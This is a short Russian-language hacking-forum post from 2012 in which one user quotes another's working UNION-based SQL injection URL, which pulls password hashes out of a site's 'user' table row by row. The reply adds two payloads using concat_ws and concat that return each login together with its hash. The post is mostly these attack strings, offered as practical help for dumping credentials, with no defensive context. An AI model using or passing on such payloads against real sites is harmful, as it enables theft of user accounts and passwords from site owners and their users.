02.02.2012, 05:34
|
|
Познающий
Регистрация: 02.02.2011
Сообщений: 63
Провел на форуме:
13201
Репутация:
17
|
|
Сообщение от Киев
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+ concat_ws(0x2F,login,pass)+from+user+limit+0,1/*
вывод будет логин/хеш
или так
index.php?kat=2&kp=-39+union+select+ concat(login,0x2F,pass)+from+user+limit+0,1/*
вывод будет такой же
|
|
|